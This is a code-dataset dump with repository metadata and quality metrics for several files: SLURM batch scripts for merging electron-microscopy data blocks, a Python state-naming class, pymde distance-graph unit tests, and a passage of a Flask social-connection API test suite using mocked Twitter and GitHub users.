hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
94a0ed06a92bcfeb85d4d0371a1d25ffbf3380bc | 7,143 | py | Python | snippets/3DEM/Z_oldscratch/scratch6.py | michielkleinnijenhuis/EM | f46a9b11298919b359e80d9f23a7e824df1356cb | [
"Apache-2.0"
] | null | null | null | snippets/3DEM/Z_oldscratch/scratch6.py | michielkleinnijenhuis/EM | f46a9b11298919b359e80d9f23a7e824df1356cb | [
"Apache-2.0"
] | null | null | null | snippets/3DEM/Z_oldscratch/scratch6.py | michielkleinnijenhuis/EM | f46a9b11298919b359e80d9f23a7e824df1356cb | [
"Apache-2.0"
] | null | null | null | scriptdir="$HOME/workspace/EM"
# DATA="$HOME/oxdata/P01"
datadir="$DATA/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
refsect='0250'
pf=; field='stack'
pf=_probs; field='volume/predictions'
pf=_probs0_eed2; field='stack'
qsubfile=$datadir/EM_mb${pf}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=02:00:00" >> $qsubfile
echo "#SBATCH --mem=250000" >> $qsubfile
echo "#SBATCH --job-name=EM_mb" >> $qsubfile
echo "python $scriptdir/convert/EM_mergeblocks.py -i \
$datadir/${dataset}_00000-01000_00000-01000_00000-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_00000-01000_00000-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_00000-01000_00000-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_01000-02000_00000-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_01000-02000_00000-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_01000-02000_00000-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_02000-03000_00000-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_02000-03000_00000-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_02000-03000_00000-00460${pf}.h5 \
-o $datadir/${dataset}_00000-03000_00000-03000_00000-00430${pf}.h5 \
-f $field -l 'zyx'" >> $qsubfile
sbatch -p compute $qsubfile
#rsync -avz ndcn0180@arcus.arc.ox.ac.uk:/data/ndcn-fmrib-water-brain/ndcn0180/EM/M3/M3_S1_GNU/m000_00000-03000_?????-?????_?????-?????.h5 /Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/
scriptdir="$HOME/workspace/EM"
DATA="$HOME/oxdata"
datadir="$DATA/P01/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
pf=;
python $scriptdir/convert/EM_stack2stack.py \
"${datadir}/${dataset}_00000-03000_00000-03000_00000-00430.h5" \
"${datadir}/${dataset}_00000-03000_00000-03000_00000-00430.nii.gz" \
-i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u
x=0; X=3000; y=0; Y=3000; z=0; Z=430; layer=1;
qsubfile=$datadir/EM_eed_submit_${x}-${X}_${y}-${Y}_${layer}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=100:00:00" >> $qsubfile
echo "#SBATCH --mem=256000" >> $qsubfile
echo "#SBATCH --job-name=EM_eed" >> $qsubfile
echo "$datadir/bin/EM_eed '$datadir' \
'${dataset}_`printf %05d ${x}`-`printf %05d ${X}`_`printf %05d ${y}`-`printf %05d ${Y}`_`printf %05d ${z}`-`printf %05d ${Z}`_probs' \
'/volume/predictions' '/stack' $layer \
> $datadir/${dataset}_`printf %05d ${x}`-`printf %05d ${X}`_`printf %05d ${y}`-`printf %05d ${Y}`_`printf %05d ${z}`-`printf %05d ${Z}`_probs.log &" >> $qsubfile
echo "wait" >> $qsubfile
sbatch -p compute $qsubfile
x=0000; X=3000; y=0000; Y=3000; z=0; Z=430; # mem +- 188GB for MA
qsubfile=$datadir/EM_p2l_${x}-${X}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=24:00:00" >> $qsubfile
echo "#SBATCH --mem=256000" >> $qsubfile
echo "#SBATCH --job-name=EM_ws" >> $qsubfile
echo "python $scriptdir/mesh/prob2labels.py $datadir $dataset \
--SEfile '_seg.h5' \
-n 5 -o 220 235 491 -s 430 4460 5217 \
-x $x -X $X -y $y -Y $Y -z $z -Z $Z > $datadir/output_${x}-${X}_${y}-${Y} &" >> $qsubfile
echo "wait" >> $qsubfile
sbatch -p compute $qsubfile
sbatch -p devel $qsubfile
--SEfile '_seg.h5' --MAfile '_probs_ws_MAfilled.h5' --MMfile '_probs_ws_MMdistsum_distfilter.h5' --UAfile '_probs_ws_UA.h5' --PAfile '_probs_ws_PA.h5'
scriptdir="$HOME/workspace/EM"
# DATA="$HOME/oxdata/P01"
datadir="$DATA/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
refsect='0250'
rename _00000-00460.h5 _00030-00460.h5 ${dataset}_?????-?????_?????-?????_00000-00460.h5
rename m000_05000-06000 m000_05000-05217 ${dataset}_05000-06000_?????-?????_?????-?????.h5
rename _04000-05000_00030-00460.h5 _04000-04460_00030-00460.h5 ${dataset}_?????-?????_04000-05000_?????-?????.h5
rename _00000-00460 _00030-00460 ${dataset}_?????-?????_?????-?????_00000-00460_probs.*
rename m000_05000-06000 m000_05000-05217 ${dataset}_05000-06000_?????-?????_?????-?????_probs.*
rename _04000-05000_00030-00460 _04000-04460_00030-00460 ${dataset}_?????-?????_04000-05000_?????-?????_probs.*
rename _00000-00460 _00030-00460 ${dataset}_?????-?????_?????-?????_00000-00460_probs0_eed2.*
rename m000_05000-06000 m000_05000-05217 ${dataset}_05000-06000_?????-?????_?????-?????_probs0_eed2.*
rename _04000-05000_00030-00460 _04000-04460_00030-00460 ${dataset}_?????-?????_04000-05000_?????-?????_probs0_eed2.*
rename _00000-00460 _00030-00460 m000_*
rename m000_05000-06000 m000_05000-05217 m000_*
rename _04000-05000_00030-00460 _04000-04460_00030-00460 m000_*
pf=; field='stack'
pf=_probs; field='volume/predictions'
pf=_probs0_eed2; field='stack'
qsubfile=$datadir/EM_mb${pf}.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=02:00:00" >> $qsubfile
#echo "#SBATCH --mem=50000" >> $qsubfile
echo "#SBATCH --job-name=EM_mb" >> $qsubfile
echo "python $scriptdir/convert/EM_mergeblocks.py -i \
$datadir/${dataset}_00000-01000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_00000-01000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_01000-02000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_02000-03000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_03000-04000_00030-00460${pf}.h5 \
$datadir/${dataset}_00000-01000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_01000-02000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_02000-03000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_03000-04000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_04000-05000_04000-04460_00030-00460${pf}.h5 \
$datadir/${dataset}_05000-05217_04000-04460_00030-00460${pf}.h5 \
-o $datadir/${dataset}_00000-05217_00000-04460_00030-00460${pf}.h5 \
-f $field -l 'zyx'" >> $qsubfile
sbatch -p compute $qsubfile
| 45.208861 | 181 | 0.708666 | 1,068 | 7,143 | 4.495318 | 0.127341 | 0.142887 | 0.074984 | 0.123308 | 0.841908 | 0.825661 | 0.813372 | 0.790252 | 0.501146 | 0.341804 | 0 | 0.303053 | 0.069159 | 7,143 | 157 | 182 | 45.496815 | 0.41901 | 0.039899 | 0 | 0.368 | 0 | 0.024 | 0.158225 | 0.035761 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.016 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
94e2d714217023c913220eb5e9fe0cb80257387b | 660 | py | Python | finenight/python/nameGenerator.py | rmuir/moman | 46476f93adafdb7489f7cb1ce2aa9490db25eaff | [
"MIT"
] | 21 | 2015-05-14T07:56:39.000Z | 2021-10-10T13:30:05.000Z | finenight/python/nameGenerator.py | rmuir/moman | 46476f93adafdb7489f7cb1ce2aa9490db25eaff | [
"MIT"
] | 2 | 2015-01-30T19:29:56.000Z | 2015-11-20T19:37:44.000Z | finenight/python/nameGenerator.py | rmuir/moman | 46476f93adafdb7489f7cb1ce2aa9490db25eaff | [
"MIT"
] | 7 | 2015-06-19T02:21:28.000Z | 2021-03-14T15:19:21.000Z |
class IndexNameGenerator:
"""Renaming states with this class is not stable, that is,
it's not sure that renaming the FSA will give allways the
same result.
"""
def __init__(self):
self.index = 0
def generate(self):
name = "q" + str(self.index)
self.index += 1
return name
class PlainIndexNameGenerator:
"""Renaming states with this class is not stable, that is,
it's not sure that renaming the FSA will give allways the
same result.
"""
def __init__(self):
self.index = 0
def generate(self):
name = str(self.index)
self.index += 1
return name
| 23.571429 | 62 | 0.612121 | 89 | 660 | 4.449438 | 0.359551 | 0.136364 | 0.090909 | 0.111111 | 0.868687 | 0.868687 | 0.868687 | 0.868687 | 0.707071 | 0.707071 | 0 | 0.008715 | 0.304545 | 660 | 27 | 63 | 24.444444 | 0.854031 | 0.383333 | 0 | 0.714286 | 0 | 0 | 0.002717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
a220265fdc9759b4b0e49928c93f47bce8ed3855 | 4,194 | py | Python | pymde/preprocess/test_data_matrix.py | kruus/pymde | 0bfa9c308660bda2fa5161ffce00ce22ef6e773b | [
"Apache-2.0"
] | 379 | 2021-02-04T23:35:01.000Z | 2022-03-28T20:13:49.000Z | pymde/preprocess/test_data_matrix.py | kruus/pymde | 0bfa9c308660bda2fa5161ffce00ce22ef6e773b | [
"Apache-2.0"
] | 40 | 2021-03-23T05:59:13.000Z | 2022-03-29T02:22:34.000Z | pymde/preprocess/test_data_matrix.py | kruus/pymde | 0bfa9c308660bda2fa5161ffce00ce22ef6e773b | [
"Apache-2.0"
] | 21 | 2021-02-09T09:34:07.000Z | 2022-03-09T03:19:06.000Z | import numpy as np
import scipy.sparse as sp
import torch
from pymde import preprocess
import pymde.testing as testing
@testing.cpu_and_cuda
def test_all_distances_numpy(device):
del device
np.random.seed(0)
data_matrix = np.random.randn(4, 2)
graph = preprocess.data_matrix.distances(data_matrix)
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == 6
testing.assert_all_equal(
graph.edges,
torch.tensor([[0, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 3]]),
)
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_all_distances_torch(device):
np.random.seed(0)
data_matrix = torch.tensor(
np.random.randn(4, 2), dtype=torch.float, device=device
)
graph = preprocess.data_matrix.distances(data_matrix)
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == 6
testing.assert_all_equal(
graph.edges,
torch.tensor([[0, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 3]]),
)
for e, d in zip(graph.edges, graph.distances):
e = e
d = d
true_distance = (data_matrix[e[0]] - data_matrix[e[1]]).norm()
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_all_distances_sparse(device):
del device
np.random.seed(0)
data_matrix = sp.csr_matrix(np.random.randn(4, 2))
graph = preprocess.data_matrix.distances(data_matrix)
data_matrix = data_matrix.todense()
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == 6
testing.assert_all_equal(
graph.edges,
torch.tensor([[0, 1], [0, 2], [0, 3], [1, 2], [1, 3], [2, 3]]),
)
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_some_distances_numpy(device):
del device
np.random.seed(0)
max_distances = 50
retain_fraction = max_distances / int(500 * (499) / 2)
data_matrix = np.random.randn(500, 2)
graph = preprocess.data_matrix.distances(
data_matrix, retain_fraction=retain_fraction
)
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == max_distances
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_some_distances_torch(device):
np.random.seed(0)
max_distances = 50
retain_fraction = max_distances / int(500 * (499) / 2)
data_matrix = torch.tensor(
np.random.randn(500, 2), dtype=torch.float, device=device
)
graph = preprocess.data_matrix.distances(
data_matrix, retain_fraction=retain_fraction
)
data_matrix = data_matrix.cpu().numpy()
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == max_distances
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
@testing.cpu_and_cuda
def test_some_distances_sparse(device):
del device
np.random.seed(0)
max_distances = 50
retain_fraction = max_distances / int(500 * (499) / 2)
data_matrix = sp.csr_matrix(np.random.randn(500, 2))
graph = preprocess.data_matrix.distances(
data_matrix, retain_fraction=retain_fraction
)
data_matrix = data_matrix.todense()
assert graph.n_items == data_matrix.shape[0]
assert graph.n_edges == max_distances
for e, d in zip(graph.edges, graph.distances):
e = e.cpu().numpy()
d = d.item()
true_distance = np.linalg.norm(data_matrix[e[0]] - data_matrix[e[1]])
testing.assert_allclose(true_distance, d)
| 31.066667 | 77 | 0.652122 | 623 | 4,194 | 4.184591 | 0.101124 | 0.161105 | 0.055236 | 0.039125 | 0.952052 | 0.950518 | 0.950518 | 0.917146 | 0.893748 | 0.855006 | 0 | 0.032817 | 0.215308 | 4,194 | 134 | 78 | 31.298507 | 0.759344 | 0 | 0 | 0.741071 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 1 | 0.053571 | false | 0 | 0.044643 | 0 | 0.098214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a220f418eca6417c5eba4e4b899fe765440ce7c8 | 14,580 | py | Python | tests/test_service_api.py | danertor/devsocial | d0d307c1512b4233a6bb1f7cb71cf749e16b7daa | [
"MIT"
] | null | null | null | tests/test_service_api.py | danertor/devsocial | d0d307c1512b4233a6bb1f7cb71cf749e16b7daa | [
"MIT"
] | null | null | null | tests/test_service_api.py | danertor/devsocial | d0d307c1512b4233a6bb1f7cb71cf749e16b7daa | [
"MIT"
] | null | null | null | # pylint: disable=missing-module-docstring, missing-class-docstring, missing-function-docstring
# pylint: disable=unused-variable, unused-argument, too-few-public-methods, unused-import, no-self-use
import pytest
from flask.testing import FlaskClient
from devsocial.config import get_os_var
from devsocial.dbmodels import db, migrate
from devsocial.exceptions import InvalidHandleError
from devsocial.service.app import app
from devsocial.service.v1.routes import dev_social_api
from devsocial.service.v1.handlers import register
import devsocial.service.routes
from devsocial.github.models import GitHubDeveloper, GitHubOrganisation
from devsocial.twitter.models import TwitterDeveloper
# pylint: disable=redefined-outer-name
from tests.utils import remove_registered_at
@pytest.fixture(scope='module')
def client():
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite://"
app.config["DEBUG"] = get_os_var('FLASK_DEBUG', default='False', mandatory=False) == 'True'
app.config["Development"] = app.config["DEBUG"]
app.config["LOG_LEVEL"] = "DEBUG" if app.config["DEBUG"] else 'ERROR'
app.register_blueprint(dev_social_api, url_prefix='/')
with app.test_client() as client:
with app.app_context():
db.init_app(app)
migrate.init_app(app, db)
yield client
SERVICE_API_PORT = '8080'
SERVICE_API_HOST = 'localhost'
# pylint: disable=invalid-name
class TestRealtimeApi:
realtime_endpoint = f"http://{SERVICE_API_HOST}:SERVICE_API_PORT"
realtime_uri = "connected/realtime/{}/{}"
registered_at = "2022-01-25T17:55:10Z"
# Two connected developers
dev1_handle = 'homer'
dev2_handle = 'lenny'
dev1_twitter_id = '1'
dev2_twitter_id = '2'
twitter_dev1: TwitterDeveloper = TwitterDeveloper(dev1_handle, id=dev1_twitter_id)
twitter_dev2: TwitterDeveloper = TwitterDeveloper(dev2_handle, id=dev2_twitter_id)
twitter_dev1.followers.append(twitter_dev2.id)
twitter_dev2.followers.append(twitter_dev1.id)
organisation_name_connected = "Nuclear Plant"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev1: GitHubDeveloper = GitHubDeveloper(dev1_handle)
github_dev1.organisations.append(organisation)
github_dev2: GitHubDeveloper = GitHubDeveloper(dev2_handle)
github_dev2.organisations.append(organisation)
twitter_devs_connected = [twitter_dev1, twitter_dev2]
github_devs_connected = [github_dev1, github_dev2]
twitter_devs_connected_iter = (i for i in range(len(twitter_devs_connected)))
github_devs_connected_iter = (i for i in range(len(github_devs_connected)))
# Two not fully connected developers
dev3_handle = 'krasty'
dev4_handle = 'bart'
dev3_twitter_id = '3'
dev4_twitter_id = '4'
twitter_dev3: TwitterDeveloper = TwitterDeveloper(dev3_handle, id=dev3_twitter_id)
twitter_dev4: TwitterDeveloper = TwitterDeveloper(dev4_handle, id=dev4_twitter_id)
twitter_dev3.followers.append(twitter_dev4.id)
organisation_name_dev3 = "TV Show"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev3: GitHubDeveloper = GitHubDeveloper(dev3_handle)
github_dev3.organisations.append(organisation)
github_dev4: GitHubDeveloper = GitHubDeveloper(dev4_handle)
twitter_devs_not_connected = [twitter_dev3, twitter_dev4]
github_devs_not_connected = [github_dev3, github_dev4]
twitter_devs_not_connected_iter = (i for i in range(len(twitter_devs_not_connected)))
github_devs_not_connected_iter = (i for i in range(len(github_devs_not_connected)))
def mock_twitter_get_user_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_connected_iter)
except StopIteration as _:
self.twitter_devs_connected_iter = (i for i in range(len(self.twitter_devs_connected)))
idx = next(self.twitter_devs_connected_iter)
return self.twitter_devs_connected[idx]
def mock_github_user_user_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_connected_iter)
except StopIteration as _:
self.github_devs_connected_iter = (i for i in range(len(self.github_devs_connected)))
idx = next(self.github_devs_connected_iter)
return self.github_devs_connected[idx]
def mock_twitter_get_user_not_connected(self, *ignored_arg):
try:
idx = next(self.twitter_devs_not_connected_iter)
except StopIteration as _:
self.twitter_devs_not_connected_iter = (i for i in range(len(self.twitter_devs_not_connected)))
idx = next(self.twitter_devs_not_connected_iter)
return self.twitter_devs_not_connected[idx]
def mock_github_user_user_not_connected(self, *ignored_arg):
try:
idx = next(self.github_devs_not_connected_iter)
except StopIteration as _:
self.github_devs_not_connected_iter = (i for i in range(len(self.github_devs_not_connected)))
idx = next(self.github_devs_not_connected_iter)
return self.github_devs_not_connected[idx]
def mock_twitter_get_user_not_found(self, handle, *ignored_arg):
raise InvalidHandleError(f"{handle} is no a valid user in twitter")
def mock_github_get_user_not_found(self, handle, *ignored_arg):
raise InvalidHandleError(f"{handle} is no a valid user in github")
def test_realtime_response_200_ok_connected(self, monkeypatch, client: FlaskClient):
expected_response = {'connected': True, 'organisations': [self.organisation_name_connected]}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_connected)
response = client.get(self.realtime_uri.format(self.dev1_handle, self.dev2_handle))
assert response.status_code == 200
assert response.json == expected_response
def test_realtime_response_200_ok_not_connected(self, monkeypatch, client: FlaskClient):
expected_response = {'connected': False}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_not_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_not_connected)
response = client.get(self.realtime_uri.format(self.dev3_handle, self.dev4_handle))
assert response.status_code == 200
assert response.json == expected_response
def test_realtime_response_400_bad_same_handle(self, monkeypatch, client: FlaskClient):
expected_response = {'errors': ["'handle1' and 'handle2' have the same value", ]}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_connected)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_user_user_connected)
response = client.get(self.realtime_uri.format(self.dev1_handle, self.dev1_handle))
assert response.status_code == 400
assert response.json == expected_response
def test_realtime_response_404_handle_not_found(self, monkeypatch, client: FlaskClient):
expected_response = {'errors': [f"{self.dev1_handle} is no a valid user in github",
f"{self.dev1_handle} is no a valid user in twitter",
f"{self.dev2_handle} is no a valid user in github",
f"{self.dev2_handle} is no a valid user in twitter"]}
with monkeypatch.context() as mp:
mp.setattr(devsocial.service.v1.social_net.twitter_connector,
"get_user", self.mock_twitter_get_user_not_found)
mp.setattr(devsocial.service.v1.social_net.github_connector,
"get_user", self.mock_github_get_user_not_found)
response = client.get(self.realtime_uri.format(self.dev1_handle, self.dev2_handle))
assert response.status_code == 404
assert response.json == expected_response
# pylint: disable=invalid-name
class TestRegisterApi:
realtime_endpoint = f"http://{SERVICE_API_HOST}:SERVICE_API_PORT"
realtime_uri = "connected/realtime/{}/{}"
registered_at = "2022-01-25T17:55:10Z"
# Two connected developers
dev1_handle = 'homer'
dev2_handle = 'lenny'
dev1_twitter_id = '1'
dev2_twitter_id = '2'
twitter_dev1: TwitterDeveloper = TwitterDeveloper(dev1_handle, id=dev1_twitter_id)
twitter_dev2: TwitterDeveloper = TwitterDeveloper(dev2_handle, id=dev2_twitter_id)
twitter_dev1.followers.append(twitter_dev2.id)
twitter_dev2.followers.append(twitter_dev1.id)
organisation_name_connected = "Nuclear Plant"
organisation = GitHubOrganisation(organisation_name_connected)
github_dev1: GitHubDeveloper = GitHubDeveloper(dev1_handle)
github_dev1.organisations.append(organisation)
github_dev2: GitHubDeveloper = GitHubDeveloper(dev2_handle)
github_dev2.organisations.append(organisation)
twitter_devs_connected = [twitter_dev1, twitter_dev2]
github_devs_connected = [github_dev1, github_dev2]
twitter_devs_connected_iter = (i for i in range(len(twitter_devs_connected)))
github_devs_connected_iter = (i for i in range(len(github_devs_connected)))
# Two not fully connected developers
